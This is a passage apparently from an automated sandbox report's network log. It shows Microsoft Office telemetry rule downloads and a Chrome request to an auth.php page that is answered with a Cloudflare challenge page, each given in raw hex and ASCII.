                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          118192.168.2.44988213.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:34 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:35 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:35 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 479
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                          ETag: "0x8DC582B989EE75B"
                                                                          x-ms-request-id: 32c7c32d-b01e-003e-2b01-488e41000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195135Z-r1cf579d778v97q7hC1EWRf95c00000005x0000000005nq1
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:35 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          119192.168.2.44988313.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:35 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:35 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:35 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 415
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                          ETag: "0x8DC582BA80D96A1"
                                                                          x-ms-request-id: 15edef34-f01e-0020-0f44-49956b000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195135Z-r1cf579d778w59f9hC1EWRze6w00000006n0000000000x11
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:35 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          120192.168.2.44988413.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:35 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:36 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:36 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 471
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                          ETag: "0x8DC582B97E6FCDD"
                                                                          x-ms-request-id: 45682ef5-801e-0048-7703-48f3fb000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195136Z-r1cf579d778x776bhC1EWRdk800000000660000000008mmn
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:36 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          121192.168.2.44988513.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:35 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:36 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:36 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 419
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                          ETag: "0x8DC582B9C710B28"
                                                                          x-ms-request-id: a7f5343d-701e-001e-5304-48f5e6000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195136Z-r1cf579d778bb9vvhC1EWRs95400000005vg000000005tzd
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:36 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          122192.168.2.44988613.107.246.63443
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:35 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                          Connection: Keep-Alive
                                                                          Accept-Encoding: gzip
                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                          Host: otelrules.azureedge.net
                                                                          2024-12-08 19:51:36 UTC470INHTTP/1.1 200 OK
                                                                          Date: Sun, 08 Dec 2024 19:51:36 GMT
                                                                          Content-Type: text/xml
                                                                          Content-Length: 477
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800, immutable
                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                          ETag: "0x8DC582BA54DCC28"
                                                                          x-ms-request-id: b6d54f7b-d01e-0066-034b-49ea17000000
                                                                          x-ms-version: 2018-03-28
                                                                          x-azure-ref: 20241208T195136Z-r1cf579d7782w22mhC1EWR2ebg000000018g000000002eqk
                                                                          x-fd-int-roxy-purgeid: 0
                                                                          X-Cache: TCP_HIT
                                                                          Accept-Ranges: bytes
                                                                          2024-12-08 19:51:36 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          123192.168.2.449889172.67.215.2084431012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-12-08 19:51:37 UTC346OUTGET /auth.php HTTP/1.1
                                                                          Host: proficocap.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-12-08 19:51:37 UTC1285INHTTP/1.1 403 Forbidden
                                                                          Date: Sun, 08 Dec 2024 19:51:37 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                          Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                          Cross-Origin-Embedder-Policy: require-corp
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Cross-Origin-Resource-Policy: same-origin
                                                                          Origin-Agent-Cluster: ?1
                                                                          Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                          Referrer-Policy: same-origin
                                                                          X-Content-Options: nosniff
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          cf-mitigated: challenge
                                                                          2024-12-08 19:51:37 UTC908INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 38 4b 54 78 39 71 51 73 39 6b 51 75 69 68 46 36 58 72 67 57 38 57 55 70 35 67 4e 4d 50 38 76 6e 6c 6d 79 51 5a 70 71 46 7a 2b 79 41 56 74 41 6e 48 6b 2b 7a 6d 4e 76 36 48 65 37 34 58 43 65 2b 76 43 70 75 64 36 79 30 6d 75 52 45 4c 6a 6b 6d 61 75 55 4e 31 4b 34 78 61 66 45 4d 63 61 48 7a 61 4c 5a 75 2b 74 6b 4c 59 4e 49 3d 24 52 44 39 6a 66 6c 2f 71 67 39 4a 38 33 34 51 54 74 62 35 35 6d 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                                          Data Ascii: cf-chl-out: 8KTx9qQs9kQuihF6XrgW8WUp5gNMP8vnlmyQZpqFz+yAVtAnHk+zmNv6He74XCe+vCpud6y0muRELjkmauUN1K4xafEMcaHzaLZu+tkLYNI=$RD9jfl/qg9J834QTtb55mw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                                          2024-12-08 19:51:37 UTC1369INData Raw: 32 32 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                                          Data Ascii: 223a<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                                          2024-12-08 19:51:37 UTC1369INData Raw: 75 4d 7a 67 34 4c 6a 51 77 4e 79 34 7a 4f 44 6b 75 4e 44 41 33 4c 6a 6b 35 4e 43 41 77 49 43 34 31 4f 54 59 74 4c 6a 51 77 4e 79 34 35 4f 44 51 74 4c 6a 4d 35 4e 79 34 7a 4f 53 30 78 4c 6a 41 31 4e 79 34 7a 4f 44 6b 74 4c 6a 59 31 49 44 41 74 4d 53 34 77 4e 54 59 74 4c 6a 4d 34 4f 53 30 75 4d 7a 6b 34 4c 53 34 7a 4f 44 6b 74 4c 6a 4d 35 4f 43 30 75 4f 54 67 30 49 44 41 74 4c 6a 55 35 4e 79 34 7a 4f 54 67 74 4c 6a 6b 34 4e 53 34 30 4d 44 59 74 4c 6a 4d 35 4e 79 41 78 4c 6a 41 31 4e 69 30 75 4d 7a 6b 33 49 69 38 2b 50 43 39 7a 64 6d 63 2b 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 6e 6f 2d 72 65 70 65 61 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 63 6f 6e 74 61 69 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 34 70 78 7d 40 6d
                                                                          Data Ascii: uMzg4LjQwNy4zODkuNDA3Ljk5NCAwIC41OTYtLjQwNy45ODQtLjM5Ny4zOS0xLjA1Ny4zODktLjY1IDAtMS4wNTYtLjM4OS0uMzk4LS4zODktLjM5OC0uOTg0IDAtLjU5Ny4zOTgtLjk4NS40MDYtLjM5NyAxLjA1Ni0uMzk3Ii8+PC9zdmc+);background-repeat:no-repeat;background-size:contain;padding-left:34px}@m
                                                                          2024-12-08 19:51:37 UTC1369INData Raw: 51 6c 4e 41 39 66 77 30 51 33 61 6b 70 79 53 51 62 68 46 6e 45 44 53 57 67 54 53 77 36 32 69 47 39 37 69 5f 79 35 45 71 4f 5f 43 68 5f 75 61 72 44 4e 36 6d 5f 71 6c 66 4b 69 54 36 62 58 6a 6f 4c 52 69 61 73 39 41 59 61 44 74 2e 70 4e 6a 56 6b 59 46 6d 39 59 46 74 77 47 75 31 50 6c 41 35 35 62 4e 7a 70 65 7a 4c 56 43 47 48 78 51 75 58 6d 6d 44 79 54 4b 42 42 63 35 70 39 41 47 68 59 56 6c 6d 30 6e 4d 34 5a 4c 69 53 30 4d 41 71 38 61 59 6b 47 49 53 4c 6c 43 73 64 64 31 59 32 37 55 7a 50 58 59 46 6c 48 4b 53 31 59 48 49 43 35 69 71 32 41 70 75 72 70 79 56 4c 41 41 68 5f 79 32 42 5a 35 4c 55 76 5a 31 63 34 6f 37 55 39 54 77 66 50 7a 42 45 4b 7a 6d 6d 55 41 43 42 4d 4f 2e 4f 34 54 65 4f 5f 32 71 73 4d 37 68 55 6e 53 39 66 4a 4a 30 6a 41 47 58 42 6a 55 6c 63 56
                                                                          Data Ascii: QlNA9fw0Q3akpySQbhFnEDSWgTSw62iG97i_y5EqO_Ch_uarDN6m_qlfKiT6bXjoLRias9AYaDt.pNjVkYFm9YFtwGu1PlA55bNzpezLVCGHxQuXmmDyTKBBc5p9AGhYVlm0nM4ZLiS0MAq8aYkGISLlCsdd1Y27UzPXYFlHKS1YHIC5iq2ApurpyVLAAh_y2BZ5LUvZ1c4o7U9TwfPzBEKzmmUACBMO.O4TeO_2qsM7hUnS9fJJ0jAGXBjUlcV
                                                                          2024-12-08 19:51:37 UTC1369INData Raw: 39 79 4d 6e 69 6a 32 59 57 6e 5a 45 4a 75 6a 74 79 4d 41 32 77 52 38 42 65 76 47 52 74 5a 64 39 4c 52 33 7a 6c 6c 39 63 70 63 56 6b 34 31 70 2e 65 54 47 78 46 7a 2e 4e 70 4a 75 70 37 31 71 49 30 6e 72 4d 42 46 66 5a 4d 50 39 42 71 65 65 32 51 4d 66 32 43 67 6f 44 77 47 46 4c 63 77 35 7a 48 31 33 4f 4e 41 32 56 45 51 2e 44 79 35 6d 5f 56 41 36 6f 59 58 7a 50 49 31 45 71 63 50 4f 42 4f 47 37 35 66 46 66 4f 72 37 4b 54 6f 76 67 6f 55 4b 62 73 44 65 4d 61 78 73 5a 72 36 4b 78 51 71 32 47 6f 39 78 73 39 6d 31 4c 76 58 73 51 50 4a 69 35 7a 5a 59 58 36 50 53 35 6c 32 4a 43 42 55 4c 42 77 33 6f 30 4c 31 51 51 76 73 70 4c 38 38 39 41 69 43 52 74 6b 66 75 55 66 61 63 4f 33 4a 79 68 30 33 47 59 4c 63 7a 71 72 50 66 42 31 4d 75 67 53 4c 42 6c 51 74 4d 45 33 38 4f 57
                                                                          Data Ascii: 9yMnij2YWnZEJujtyMA2wR8BevGRtZd9LR3zll9cpcVk41p.eTGxFz.NpJup71qI0nrMBFfZMP9Bqee2QMf2CgoDwGFLcw5zH13ONA2VEQ.Dy5m_VA6oYXzPI1EqcPOBOG75fFfOr7KTovgoUKbsDeMaxsZr6KxQq2Go9xs9m1LvXsQPJi5zZYX6PS5l2JCBULBw3o0L1QQvspL889AiCRtkfuUfacO3Jyh03GYLczqrPfB1MugSLBlQtME38OW
                                                                          2024-12-08 19:51:37 UTC1369INData Raw: 6c 56 58 5f 54 69 4a 6c 73 63 6a 78 46 79 68 65 35 34 49 47 53 2e 69 2e 56 32 44 5f 79 65 4e 70 37 47 6e 33 4a 37 58 41 70 54 56 2e 6a 54 55 57 32 69 5f 75 76 55 49 41 71 74 34 35 51 4a 36 69 46 37 56 33 72 37 73 6b 38 5a 42 51 73 56 6c 39 55 55 4b 6c 6c 5f 54 68 37 5f 71 79 47 48 6a 47 75 50 48 46 6f 31 44 4d 41 6e 6b 6d 51 6b 31 7a 76 56 71 79 34 75 6f 79 35 59 54 77 4e 48 36 37 53 73 34 33 72 4a 57 49 57 75 64 5a 61 41 41 78 6c 30 56 79 6f 4e 36 5f 35 73 32 6f 67 38 69 41 7a 4f 50 4d 54 54 38 69 58 57 4a 49 57 5f 70 62 33 59 4d 30 73 73 53 54 66 70 4d 39 4e 6f 79 56 37 2e 79 4b 78 57 78 63 51 54 59 6f 48 37 6a 4f 65 41 5f 77 75 70 67 34 62 69 5f 30 45 4b 32 6b 79 78 68 6f 48 65 54 42 42 69 6c 4d 79 79 52 67 6d 6e 70 2e 57 52 31 45 50 72 39 67 71 4a 72
                                                                          Data Ascii: lVX_TiJlscjxFyhe54IGS.i.V2D_yeNp7Gn3J7XApTV.jTUW2i_uvUIAqt45QJ6iF7V3r7sk8ZBQsVl9UUKll_Th7_qyGHjGuPHFo1DMAnkmQk1zvVqy4uoy5YTwNH67Ss43rJWIWudZaAAxl0VyoN6_5s2og8iAzOPMTT8iXWJIW_pb3YM0ssSTfpM9NoyV7.yKxWxcQTYoH7jOeA_wupg4bi_0EK2kyxhoHeTBBilMyyRgmnp.WR1EPr9gqJr
                                                                          2024-12-08 19:51:37 UTC1369INData Raw: 59 31 4e 45 61 56 61 4c 76 64 54 4f 79 64 42 62 46 69 6b 58 46 44 32 35 31 67 61 6b 46 2e 63 4e 61 47 4f 76 6b 50 73 4d 6c 63 62 31 2e 64 6f 65 50 4f 58 6d 6c 77 45 51 42 36 56 65 4b 4c 64 37 47 33 63 65 77 4d 78 49 6e 6f 4c 42 35 74 51 62 54 77 57 6f 48 76 4b 77 61 59 33 4b 50 4e 75 4d 50 74 5a 39 35 4a 54 63 33 45 48 5f 72 55 58 4f 6e 6d 65 6c 4f 71 76 61 78 6d 59 6b 4a 71 45 4f 72 72 6f 42 48 4f 38 38 70 6b 47 65 4c 4a 42 67 47 54 6f 45 45 64 54 4b 6e 72 4f 38 7a 66 76 4f 46 49 55 4a 57 36 47 49 6e 43 38 4f 6f 65 64 4c 50 39 76 56 2e 41 39 72 71 5f 36 44 68 37 69 46 66 6e 43 2e 4d 4a 77 44 4b 44 69 6f 5f 2e 46 43 42 46 70 36 6e 6d 69 4f 68 4e 73 7a 42 4b 56 72 6d 78 58 39 71 63 49 34 39 44 59 54 75 35 55 65 35 43 6a 45 38 34 71 6e 6c 77 37 44 41 39 66
                                                                          Data Ascii: Y1NEaVaLvdTOydBbFikXFD251gakF.cNaGOvkPsMlcb1.doePOXmlwEQB6VeKLd7G3cewMxInoLB5tQbTwWoHvKwaY3KPNuMPtZ95JTc3EH_rUXOnmelOqvaxmYkJqEOrroBHO88pkGeLJBgGToEEdTKnrO8zfvOFIUJW6GInC8OoedLP9vV.A9rq_6Dh7iFfnC.MJwDKDio_.FCBFp6nmiOhNszBKVrmxX9qcI49DYTu5Ue5CjE84qnlw7DA9f
                                                                          2024-12-08 19:51:37 UTC556INData Raw: 74 2e 63 4f 67 55 48 61 73 68 2e 6c 65 6e 67 74 68 29 2e 69 6e 64 65 78 4f 66 28 27 3f 27 29 20 21 3d 3d 20 2d 31 20 3f 20 27 3f 27 20 3a 20 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 69 66 20 28 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 20 26 26 20 77 69 6e 64 6f 77 2e 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 29 20 7b 76 61 72 20 6f 67 55 20 3d 20 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 51 75 65 72 79 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 3b 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 22 5c 2f 61 75 74 68 2e 70 68 70 3f 5f 5f 63 66 5f 63
                                                                          Data Ascii: t.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null, "\/auth.php?__cf_c
                                                                          2024-12-08 19:51:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          124192.168.2.44988813.107.246.63443
                                                                          TimestampBytes transferredDirectionData
